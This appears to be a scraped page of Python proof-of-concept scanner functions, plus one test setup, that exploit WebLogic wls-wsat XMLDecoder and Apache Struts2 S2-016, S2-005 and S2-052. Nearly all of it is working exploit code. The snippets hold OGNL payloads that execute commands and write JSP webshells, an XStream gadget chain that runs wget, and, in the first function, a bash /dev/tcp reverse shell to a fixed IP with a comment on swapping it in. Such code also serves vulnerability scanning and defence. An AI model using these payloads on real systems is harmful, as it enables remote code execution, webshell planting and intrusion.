Пример #1
0
def poc(url):
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0].rstrip('/')

    mydnslog = Dnslog("weblogic-wls-xml")
    cmd = mydnslog.getCommand("dns")
    exec_cmd = '<array class="java.lang.String" length="{0}">'.format(
        len(cmd.split()))
    for i, c in enumerate(cmd.split()):
        exec_cmd += '<void index="{0}"><string>{1}</string></void>'.format(
            i, c)
    exec_cmd += '</array>'
    reverse_shell_cmd = '''
    <array class="java.lang.String" length="3">
        <void index="0">
        <string>/bin/bash</string>
        </void>
        <void index="1">
        <string>-c</string>
        </void>
        <void index="2">
        <string>bash -i &gt;&amp; /dev/tcp/192.168.1.137/2000 0&gt;&amp;1</string>
        </void>
    </array>
    '''
    payload_data = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <void class="java.lang.ProcessBuilder">
                {}
              <void method="start"/>
            </void>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''
    vulurl = url + "/wls-wsat/CoordinatorPortType"
    try:
        headers = {'Content-Type': 'text/xml;charset=UTF-8'}
        data = payload_data.format(exec_cmd)  # 替换成reverse_shell_data就是反弹shell
        resp = requests.post(vulurl, data=data, headers=headers, timeout=10)
        if mydnslog.verifyDNS(3):
            return "[weblogc-wls-xmldecoder][dnslog]" + url
        if '<faultstring>java.lang.ProcessBuilder' in resp.text or "<faultstring>0" in resp.text:
            return True
    except Exception as e:
        logging.debug(e)
    return False
Пример #2
0
def poc(url):
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0]

    command = "echo rivirsirfortest"
    mydnslog = Dnslog("s2016")
    dns_cmd = mydnslog.getCommand("dns")
    web_cmd = mydnslog.getCommand("web")
    payloads = [
        #执行命令payload
        '${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRuntime().exec("%s").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}'
        % command,
        # 爆路径payload
        "${#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#a=#req.getSession(),#b=#a.getServletContext(),#c=#b.getRealPath('/'),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#c),#matt.getWriter().flush(),#matt.getWriter().close()}",
        # dns_cmd
        '${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRuntime().exec("%s").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}'
        % dns_cmd,
        # web_cmd
        '${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#[email protected]@getRuntime().exec("%s").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}'
        % web_cmd,
        # 写shell的payload
        '#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest"),#b=new java.io.FileOutputStream(new java.lang.StringBuilder(#a.getRealPath("/")).append(@java.io.File@separator).append(#a.getParameter("name")).toString()),#b.write(#a.getParameter("t").getBytes()),#b.close(),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println("BINGO"),#genxor.flush(),#genxor.close()',
        '#req=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest"),#p=(#req.getRealPath("/")+"css3.jsp").replaceAll("\\", "/"),new java.io.BufferedWriter(new java.io.FileWriter(#p)).append(#req.getParameter("c")).close()}'
    ]

    for payload in payloads:
        vulurl = url + '?redirect:%s' % urllib.quote(payload)
        try:
            resp = requests.get(vulurl, timeout=10)
            if "rivirsirfortest" in resp.text:
                #print resp.text
                return True
            if len(resp.text) <= 100 and "webapps" in resp.text:
                return "[S2-016][web dir]%s" % resp.text + url
            if mydnslog.verifyDNS(3):
                return "[S2-016][dnslog]%s" + url
            if mydnslog.verifyHTTP(3):
                return "[S2-016][weblog]%s" + url
        except Exception as e:
            logging.debug(e)
    return False
Пример #3
0
def poc(url):
    """无回显payload, 暂不提供检测"""
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0]

    command = "touch /tmp/success"
    mydnslog = Dnslog("s2005")
    dnslog_cmd = mydnslog.getCommand("dns")
    print(dnslog_cmd)
    web_curl_cmd = mydnslog.getCommand("web_curl")
    payloads = [
        # 无回显payload
        "?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22{cmd}%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1"
        .format(cmd=command),
        # dnslog payload
        "?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22{cmd}%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1"
        .format(cmd=dnslog_cmd),
        "?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22{cmd}%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1"
        .format(cmd=web_curl_cmd)
    ]
    page1 = requests.get(url)
    for payload in payloads:
        vulurl = url + payload
        resp = requests.get(vulurl)
        if mydnslog.verifyDNS(3):
            return "[s2-005] " + url
        if mydnslog.verifyHTTP(3):
            return "[s2-005] " + url
    return False
Пример #4
0
 def setUpClass(cls):
     cls.dnslog = Dnslog("weblogic")
     cls.domain = cls.dnslog.getDomain()
     cls.dns_command = cls.dnslog.getCommand("dns")
     cls.web_command = cls.dnslog.getCommand("web")
Пример #5
0
def poc(url):
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0].rstrip('/')

    mydnslog = Dnslog("s2-052")
    weburl = mydnslog.getWeburl()
    print("weblog url: %s" % weburl)
    payload = """<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>wget</string>
                        <string>{url}</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>""".format(url=weburl)

    headers = {
        "User-Agent":
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
        "Content-Type": "application/xml"
    }
    resp = requests.post(url, data=payload, headers=headers)
    if mydnslog.verifyHTTP(3):
        return "[S2-052][weblog] " + url